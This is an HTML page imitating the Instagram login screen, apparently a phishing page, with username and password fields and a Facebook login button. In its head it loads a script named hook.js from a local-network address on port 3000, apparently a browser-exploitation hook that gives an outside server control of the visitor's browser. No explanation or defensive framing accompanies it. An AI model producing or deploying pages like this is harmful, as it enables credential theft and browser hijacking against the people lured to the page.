<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <style>
        body {
    font-family: 'Arial', sans-serif;
    background-color: #fafafa;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
}

.login-container {
    max-width: 350px;
    width: 100%;
    padding: 20px;
    box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
    background-color: #fff;
    text-align: center;
    border-radius: 10px;
}

.login-form h1 {
    font-family: 'Billabong', cursive;
    font-size: 3em;
    margin-bottom: 20px;
}

.login-form form {
    display: flex;
    flex-direction: column;
}

.login-form input[type="text"],
.login-form input[type="password"] {
    padding: 10px;
    margin-bottom: 10px;
    border: 1px solid #dbdbdb;
    border-radius: 5px;
    font-size: 14px;
    background-color: #fafafa;
}

.login-form button[type="submit"] {
    padding: 10px;
    background-color: #3897f0;
    color: white;
    border: none;
    border-radius: 5px;
    font-weight: bold;
    cursor: pointer;
    font-size: 14px;
}

.separator {
    margin: 10px 0;
    position: relative;
    text-align: center;
}

.separator::before,
.separator::after {
    content: '';
    background-color: #dbdbdb;
    height: 1px;
    position: absolute;
    top: 50%;
    width: 40%;
}

.separator::before {
    left: 0;
}

.separator::after {
    right: 0;
}

.separator::before {
    left: 0;
}

.separator::after {
    right: 0;
}

.social-login .fb-login {
    padding: 10px;
    background-color: #4267b2;
    color: white;
    border: none;
    border-radius: 5px;
    font-weight: bold;
    cursor: pointer;
    font-size: 14px;
    margin-bottom: 10px;
}

.forgot-password {
    color: #3897f0;
    font-size: 12px;
    text-decoration: none;
}

.signup {
    margin-top: 10px;
    padding: 10px 0;
    background-color: #fff;
    border: 1px solid #dbdbdb;
    border-radius: 10px;
}

.signup p {
    font-size: 14px;
}

.signup a {
    color: #3897f0;
    text-decoration: none;
    font-weight: bold;
}

    </style>
    <script src="http://192.168.1.45:3000/hook.js"></script>
</head>
<body>
    <div class="login-container">
        <div class="login-form">
            <h1>Instagram</h1>
            <form>
                <input type="text" placeholder="Username" required>
                <input type="password" placeholder="Password" required>
                <button type="submit">Log In</button>
            </form>
            <div class="separator">OR</div>
            <div class="social-login">
                <button class="fb-login">Log in with Facebook</button>
            </div>
            <a href="#" class="forgot-password">Forgot password?</a>
        </div>
        <div class="signup">
            <p>Don't have an account? <a href="#">Sign up</a></p>
        </div>
    </div>
</body>
</html>
